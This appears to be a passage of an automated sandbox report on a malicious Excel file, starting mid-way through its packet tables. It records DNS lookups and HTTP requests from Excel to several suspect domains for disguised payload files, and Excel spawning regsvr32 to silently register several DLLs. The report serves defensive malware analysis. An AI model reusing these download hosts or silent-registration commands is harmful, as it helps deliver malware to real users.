              Apr 6, 2021 09:48:02.127845049 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.128031969 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.166296005 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.482728004 CEST4916780192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.521353960 CEST80491678.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.521567106 CEST4916780192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.522023916 CEST4916780192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.603694916 CEST80491678.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.928333998 CEST80491678.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.928371906 CEST80491678.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.928489923 CEST4916780192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.928627968 CEST4916780192.168.2.228.211.4.209
              Apr 6, 2021 09:48:02.967076063 CEST80491678.211.4.209192.168.2.22
              Apr 6, 2021 09:48:03.003235102 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.161860943 CEST804916874.208.236.90192.168.2.22
              Apr 6, 2021 09:48:03.161964893 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.162693024 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.321307898 CEST804916874.208.236.90192.168.2.22
              Apr 6, 2021 09:48:03.409498930 CEST804916874.208.236.90192.168.2.22
              Apr 6, 2021 09:48:03.409692049 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.410177946 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.415561914 CEST804916874.208.236.90192.168.2.22
              Apr 6, 2021 09:48:03.415684938 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.569153070 CEST804916874.208.236.90192.168.2.22
              Apr 6, 2021 09:48:03.569214106 CEST4916880192.168.2.2274.208.236.90
              Apr 6, 2021 09:48:03.841801882 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:48:04.034101963 CEST8049169103.205.143.227192.168.2.22
              Apr 6, 2021 09:48:04.034275055 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:48:04.034775972 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:48:04.226507902 CEST8049169103.205.143.227192.168.2.22
              Apr 6, 2021 09:48:04.761071920 CEST8049169103.205.143.227192.168.2.22
              Apr 6, 2021 09:48:04.761336088 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:48:15.172677040 CEST8049169103.205.143.227192.168.2.22
              Apr 6, 2021 09:48:15.172846079 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:50:00.743765116 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:50:01.241911888 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:50:02.209271908 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:50:04.143825054 CEST4916980192.168.2.22103.205.143.227
              Apr 6, 2021 09:50:07.997279882 CEST4916980192.168.2.22103.205.143.227

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 6, 2021 09:48:00.806061029 CEST5219753192.168.2.228.8.8.8
              Apr 6, 2021 09:48:01.147500992 CEST53521978.8.8.8192.168.2.22
              Apr 6, 2021 09:48:01.625456095 CEST5309953192.168.2.228.8.8.8
              Apr 6, 2021 09:48:01.679797888 CEST53530998.8.8.8192.168.2.22
              Apr 6, 2021 09:48:02.142688036 CEST5283853192.168.2.228.8.8.8
              Apr 6, 2021 09:48:02.480325937 CEST53528388.8.8.8192.168.2.22
              Apr 6, 2021 09:48:02.946787119 CEST6120053192.168.2.228.8.8.8
              Apr 6, 2021 09:48:03.001132965 CEST53612008.8.8.8192.168.2.22
              Apr 6, 2021 09:48:03.421154022 CEST4954853192.168.2.228.8.8.8
              Apr 6, 2021 09:48:03.839102030 CEST53495488.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Apr 6, 2021 09:48:00.806061029 CEST192.168.2.228.8.8.80x73f5Standard query (0)velma-harber30ku.comA (IP address)IN (0x0001)
              Apr 6, 2021 09:48:01.625456095 CEST192.168.2.228.8.8.80x8296Standard query (0)laura9630fr.comA (IP address)IN (0x0001)
              Apr 6, 2021 09:48:02.142688036 CEST192.168.2.228.8.8.80x15d4Standard query (0)mills-skyla30ec.comA (IP address)IN (0x0001)
              Apr 6, 2021 09:48:02.946787119 CEST192.168.2.228.8.8.80xccaeStandard query (0)moumitas.comA (IP address)IN (0x0001)
              Apr 6, 2021 09:48:03.421154022 CEST192.168.2.228.8.8.80x887eStandard query (0)jacktech.jackindia.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Apr 6, 2021 09:48:01.147500992 CEST8.8.8.8192.168.2.220x73f5No error (0)velma-harber30ku.com8.211.4.209A (IP address)IN (0x0001)
              Apr 6, 2021 09:48:01.679797888 CEST8.8.8.8192.168.2.220x8296No error (0)laura9630fr.com8.211.4.209A (IP address)IN (0x0001)
              Apr 6, 2021 09:48:02.480325937 CEST8.8.8.8192.168.2.220x15d4No error (0)mills-skyla30ec.com8.211.4.209A (IP address)IN (0x0001)
              Apr 6, 2021 09:48:03.001132965 CEST8.8.8.8192.168.2.220xccaeNo error (0)moumitas.com74.208.236.90A (IP address)IN (0x0001)
              Apr 6, 2021 09:48:03.839102030 CEST8.8.8.8192.168.2.220x887eNo error (0)jacktech.jackindia.com103.205.143.227A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • velma-harber30ku.com
              • laura9630fr.com
              • mills-skyla30ec.com
              • moumitas.com
              • jacktech.jackindia.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.22491658.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 09:48:01.202414036 CEST0OUTGET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: velma-harber30ku.com
              Connection: Keep-Alive
              Apr 6, 2021 09:48:01.613493919 CEST1INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:01 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.22491668.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 09:48:01.721354961 CEST2OUTGET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: laura9630fr.com
              Connection: Keep-Alive
              Apr 6, 2021 09:48:02.127644062 CEST2INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:01 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.22491678.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 09:48:02.522023916 CEST3OUTGET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: mills-skyla30ec.com
              Connection: Keep-Alive
              Apr 6, 2021 09:48:02.928333998 CEST3INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.224916874.208.236.9080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 09:48:03.162693024 CEST4OUTGET /ds/0204.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: moumitas.com
              Connection: Keep-Alive
              Apr 6, 2021 09:48:03.409498930 CEST5INHTTP/1.1 503 Service Unavailable
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Keep-Alive: timeout=15
              Date: Tue, 06 Apr 2021 07:48:03 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.27
              Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 32 30 34 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
              Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/0204.gif was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.2249169103.205.143.22780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 09:48:04.034775972 CEST6OUTGET /ds/0204.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: jacktech.jackindia.com
              Connection: Keep-Alive
              Apr 6, 2021 09:48:04.761071920 CEST6INHTTP/1.1 503 Service Unavailable
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Content-Length: 97
              Content-Encoding: gzip
              Vary: Accept-Encoding
              Date: Tue, 06 Apr 2021 07:48:03 GMT
              Server: LiteSpeed
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 30 32 30 d1 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 b3 0a 0e ff 4f 00 00 00
              Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)7020KLS(O,V/QHPS(,V(N-*K-O


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:09:47:36
              Start date:06/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fcf0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:43
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:43
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf1.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf2.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf3.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf4.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >